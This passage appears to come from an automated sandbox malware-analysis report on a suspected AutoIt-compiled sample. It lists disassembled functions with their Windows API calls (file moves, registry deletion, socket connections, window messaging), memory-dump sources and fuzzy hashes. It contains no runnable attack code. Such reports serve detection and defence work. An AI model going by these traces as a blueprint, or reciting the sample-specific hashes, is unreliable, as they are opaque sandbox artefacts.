                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D30EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: d2bfd599ad53c349712ecea5ba9484bb8ea821bdaf05c4c03fd3ed285a9c5928
                                                            • Instruction ID: f659219ab3189e5ddcc138cc5701308e2b19d559a41caf1c40265477f6cc9e22
                                                            • Opcode Fuzzy Hash: d2bfd599ad53c349712ecea5ba9484bb8ea821bdaf05c4c03fd3ed285a9c5928
                                                            • Instruction Fuzzy Hash: EE51A3A16447D53DFB3687648C65B7ABFA99F06300F0C8889F1D49A8C2D395AC98D770
                                                            Function 00D355FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: 881d19a8b05a9e46fbcbbdeec0c686cc015470a5cccd0524d928446f15444726
                                                            • Instruction ID: 931cd0c9b7e20d53b312342136b2e62c452b34ed774fd4470f2be8a7f43e032e
                                                            • Opcode Fuzzy Hash: 881d19a8b05a9e46fbcbbdeec0c686cc015470a5cccd0524d928446f15444726
                                                            • Instruction Fuzzy Hash: 6041A465C1161876CB51EBF49C4A9EFB3BCAF04310F508956EA09E3221EB34E245D7AB
                                                            Function 00D5A056 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @U=u
                                                            • API String ID: 0-2594219639
                                                            • Opcode ID: 5d4dcf8a88c84218906841dfb95397897a8337addf8f59fc327cf2c940594bdd
                                                            • Instruction ID: acc83de49d43c55a810a09ab4a79fb366bc69039bc6a48e128a72d35951011b6
                                                            • Opcode Fuzzy Hash: 5d4dcf8a88c84218906841dfb95397897a8337addf8f59fc327cf2c940594bdd
                                                            • Instruction Fuzzy Hash: 3B419135904724AFDB109F2CDC48FA9BBA4AB09352F180265FD55EB2E1CB309D49DA71
                                                            Function 00D33671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D33697,?), ref: 00D3468B
                                                              • Part of subcall function 00D3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D33697,?), ref: 00D346A4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00D336B7
                                                            • _wcscmp.LIBCMT ref: 00D336D3
                                                            • MoveFileW.KERNEL32(?,?), ref: 00D336EB
                                                            • _wcscat.LIBCMT ref: 00D33733
                                                            • SHFileOperationW.SHELL32(?), ref: 00D3379F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: 4db4c2412f47880548c49ec907e49c0ff79fcac492644cc89e91532e703228e7
                                                            • Instruction ID: f407afd9cb8f0607c6808ccb750e494cea338d7091cfbc3be9956aac8b02ab86
                                                            • Opcode Fuzzy Hash: 4db4c2412f47880548c49ec907e49c0ff79fcac492644cc89e91532e703228e7
                                                            • Instruction Fuzzy Hash: 904180B2508344AEC751EF64D4569EFB7E8EF88380F44092EF49AC3251EB34D689C762
                                                            Function 00D57291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D572AA
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D57351
                                                            • IsMenu.USER32(?), ref: 00D57369
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D573B1
                                                            • DrawMenuBar.USER32 ref: 00D573C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: 0e3b461fe8740b7793106a5ac6e8feef979fc063fc366fc99e1e6dc566b14de1
                                                            • Instruction ID: 9a5ccbff251c02706433353fbdef4ac33fc684c3ee5c31fd826955e0403ad9fd
                                                            • Opcode Fuzzy Hash: 0e3b461fe8740b7793106a5ac6e8feef979fc063fc366fc99e1e6dc566b14de1
                                                            • Instruction Fuzzy Hash: 12411875A04208AFEF20DF50E884A9ABBB8FF04361F248529FD659B350D730AD58DB60
                                                            Function 00D50FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00D50FD4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D50FFE
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00D510B5
                                                              • Part of subcall function 00D50FA5: RegCloseKey.ADVAPI32(?), ref: 00D5101B
                                                              • Part of subcall function 00D50FA5: FreeLibrary.KERNEL32(?), ref: 00D5106D
                                                              • Part of subcall function 00D50FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00D51090
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D51058
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: c01439d10b8604aa27afb79165f64cf0332b3df072133d194ae012dc56470c0e
                                                            • Instruction ID: 5fa5763870307c77186e47863c29651c5a2e5e8615903b8c7f375a1fb528a67c
                                                            • Opcode Fuzzy Hash: c01439d10b8604aa27afb79165f64cf0332b3df072133d194ae012dc56470c0e
                                                            • Instruction Fuzzy Hash: CD310C75900209BFDF159B94DC89EFFB7BCEF08311F040169ED01E6291DA749E899AB0
                                                            Function 00D2DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D2DB2E
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D2DB54
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00D2DB57
                                                            • SysAllocString.OLEAUT32(?), ref: 00D2DB75
                                                            • SysFreeString.OLEAUT32(?), ref: 00D2DB7E
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00D2DBA3
                                                            • SysAllocString.OLEAUT32(?), ref: 00D2DBB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: c54ba3c79b4389332616d6850ea835a7ed2d48e1013090a4a5265bc57ce39726
                                                            • Instruction ID: d507ecf4effd75bd65b8b23669e5e9ee47e8daf8a75cd7a2668ebb45fa639632
                                                            • Opcode Fuzzy Hash: c54ba3c79b4389332616d6850ea835a7ed2d48e1013090a4a5265bc57ce39726
                                                            • Instruction Fuzzy Hash: 1521A172600329AF9F10DFA8EC88CBB73ADEB08364B158525FE54DB250DA70EC418770
                                                            Function 00D46173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D47D8B: inet_addr.WSOCK32(00000000), ref: 00D47DB6
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00D461C6
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D461D5
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00D4620E
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00D46217
                                                            • WSAGetLastError.WSOCK32 ref: 00D46221
                                                            • closesocket.WSOCK32(00000000), ref: 00D4624A
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00D46263
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: fd1182053901fe77d5d6aea7e81b708ba171ca8fe2d03d35a279cd076a26e2a6
                                                            • Instruction ID: 8a3cc8759794a5b36c9009dd6d136327eda92cacae099da4c48a9ce4c59a3a06
                                                            • Opcode Fuzzy Hash: fd1182053901fe77d5d6aea7e81b708ba171ca8fe2d03d35a279cd076a26e2a6
                                                            • Instruction Fuzzy Hash: ED317075600218ABDF10AF64CC85BBE7BADEF45755F044029FD06EB291DB70ED049AB2
                                                            Function 00D28E90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D28F14
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D28F27
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00D28F57
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 365058703-2258501812
                                                            • Opcode ID: fd3e9539f9bb4c8ddb2264b335b7bafcfcdb736c315161e4f4f4d7b731a33396
                                                            • Instruction ID: ffb05f3cd208e4db05bb579b9a58bf49059efdf8ac5d2f27dd79522e8a0d92a1
                                                            • Opcode Fuzzy Hash: fd3e9539f9bb4c8ddb2264b335b7bafcfcdb736c315161e4f4f4d7b731a33396
                                                            • Instruction Fuzzy Hash: 32210471A45204BFDB14ABB4DC85CFFB769DF15324F14461AF921972E1DF358809A630
                                                            Function 00D2F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: 8cf6aead4b0517707e953b959de269108546fb3994fa7afd5a8189bb035d6f48
                                                            • Instruction ID: 01f9b7af012176ef0aee8b978cf7ffd8bf8f4400b553a92bcb84b57b63044149
                                                            • Opcode Fuzzy Hash: 8cf6aead4b0517707e953b959de269108546fb3994fa7afd5a8189bb035d6f48
                                                            • Instruction Fuzzy Hash: EE2125722045716AD220AB34BC02FB773A8DF65748B18483AF98687191EB519D45E2B5
                                                            Function 00D2DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D2DC09
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D2DC2F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00D2DC32
                                                            • SysAllocString.OLEAUT32 ref: 00D2DC53
                                                            • SysFreeString.OLEAUT32 ref: 00D2DC5C
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00D2DC76
                                                            • SysAllocString.OLEAUT32(?), ref: 00D2DC84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 60ece93580c0405d600b1eae74909d26e0cf03314e4f281df34471fde41a095a
                                                            • Instruction ID: 26c58cdd2f1072c5f87af4a0b761b5c72fd76653496b488c91ae0edb8341bc88
                                                            • Opcode Fuzzy Hash: 60ece93580c0405d600b1eae74909d26e0cf03314e4f281df34471fde41a095a
                                                            • Instruction Fuzzy Hash: AD219D35605314AF9B10AFA8EC88CAB77ADEB1C364B148125FD54CB2A1DAB0EC41DB74
                                                            Function 00D2B1EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00D2B204
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D2B221
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D2B259
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D2B27F
                                                            • _wcsstr.LIBCMT ref: 00D2B289
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID: @U=u
                                                            • API String ID: 3902887630-2594219639
                                                            • Opcode ID: 8403447b5d0ace9ec99ed823c1fe3b5c02e9bef8551b8e41870633bae2994df8
                                                            • Instruction ID: 3ee81fdd9d36cb73fc10d385cac6f9d0133b9e40d8753a745b1fa6f1b802af03
                                                            • Opcode Fuzzy Hash: 8403447b5d0ace9ec99ed823c1fe3b5c02e9bef8551b8e41870633bae2994df8
                                                            • Instruction Fuzzy Hash: 6A212532204314BBEB259B75AC09E7F7B98DF59720F10402AFC04CE161EFA1DC40A2B0
                                                            Function 00D29307 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D29320
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D29352
                                                            • __itow.LIBCMT ref: 00D2936A
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D29392
                                                            • __itow.LIBCMT ref: 00D293A3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID: @U=u
                                                            • API String ID: 2983881199-2594219639
                                                            • Opcode ID: a330ae12a5f1b6399270caeca9cf3d23af36b3336e514fa692820efac111a628
                                                            • Instruction ID: d3a1209602fe8222ca1fb5fddddffb672ae991afaf252318676140c4577b9f45
                                                            • Opcode Fuzzy Hash: a330ae12a5f1b6399270caeca9cf3d23af36b3336e514fa692820efac111a628
                                                            • Instruction Fuzzy Hash: 3E210731700318BBDB10EB609C95EEEBBA9EB98714F044026FE44DB2C0D6B1CD4597B1
                                                            Function 00D575CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CD1D73
                                                              • Part of subcall function 00CD1D35: GetStockObject.GDI32(00000011), ref: 00CD1D87
                                                              • Part of subcall function 00CD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CD1D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00D57632
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00D5763F
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00D5764A
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D57659
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00D57665
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: dfcea7df9dbc7c9084797603e08c8223c24a3864036d3a0698982bfd11e21183
                                                            • Instruction ID: d19b6bed0a5fa047fb664c27f043df92d0efafcfcea9f988cfa589fbd77f0032
                                                            • Opcode Fuzzy Hash: dfcea7df9dbc7c9084797603e08c8223c24a3864036d3a0698982bfd11e21183
                                                            • Instruction Fuzzy Hash: E711D0B2100219BFEF118F64CC85EE77F6DEF083A8F114115BA04A20A0CA72AC21DBB0
                                                            Function 00CF9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __init_pointers.LIBCMT ref: 00CF9AE6
                                                              • Part of subcall function 00CF3187: EncodePointer.KERNEL32(00000000), ref: 00CF318A
                                                              • Part of subcall function 00CF3187: __initp_misc_winsig.LIBCMT ref: 00CF31A5
                                                              • Part of subcall function 00CF3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CF9EA0
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CF9EB4
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CF9EC7
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CF9EDA
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CF9EED
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00CF9F00
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00CF9F13
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00CF9F26
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00CF9F39
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00CF9F4C
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00CF9F5F
